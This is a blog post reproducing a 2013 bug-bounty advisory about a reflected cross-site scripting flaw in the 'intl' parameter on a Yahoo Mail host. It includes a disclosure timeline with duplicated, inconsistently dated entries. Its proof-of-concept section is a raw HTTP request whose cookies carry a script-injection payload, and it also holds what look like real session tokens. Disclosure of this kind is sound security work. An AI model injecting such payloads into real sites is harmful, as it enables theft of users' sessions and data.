Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
Here are the my last advisory which I’ve reported in 2013 to the Yahoo Bug Bounty Program. And again…the same story for this report as for my others :-/
If you’re interested, you can read it here:
Screenshots:
Video:
Here is my advisory for the XSS on de-mg42.mail.yahoo.com:
Advisory:
|
Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
|
Advisory ID:
|
SSCHADV2013-YahooBB-002
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on de-mg42.mail.yahoo.com
|
Vendor URL:
|
|
Vendor Status:
|
Not tested anymore
|
Bounty:
|
nothing
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The ‘intl‘-Paramter on "https://de-mg42.mail.yahoo.com/" is prone to a Cross-site Scripting vulnerability
======================
PoC-Exploit
======================
PoC-Exploit
======================
GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr
Host: de-mg42.mail.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: YM.SREQs.schurtz=1; YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4& d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV; RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0; POPUPCHECK=1387130698530;
adx=c322590@1386248182@1; T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT
&a=QAE&sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g—~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREF
LVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0a
DdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFz
YwF3bAF6egFic2xxU0JBN0U-;F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7S
qUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-
&b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN; SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5×5gJjBMR671vlpo
Basj8HY6cXSNbA—&kv=0; ywadp100034076556=3167627385; fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|
ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT; ywadp1000357943879=4084605029; fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHo
AVDq|fvis1000357943879=|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780;
AO=o=0; YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1; _br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o
&p=m2evvde012000000&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e; U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-&ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3; YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA—&d=&f=AAA&t=3bKrSB&s=55nr; DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive |
======================
Disclosure Timeline
======================
15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 – next message to the Yahoo Securiy Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
31-Dec-2013 – next message to the Yahoo Securiy Contact
04-Jan-2014 – feedback from vendor
04-Jan-2014 – vendor informed again about the three vulnerabilities
06-Jan-2014 – feedback from vendor
15-Jan-2014 – contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 – contact with Jeff Zingler (Threat Response@Yahoo) // last contact
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt
Comments
Display comments as Linear | Threaded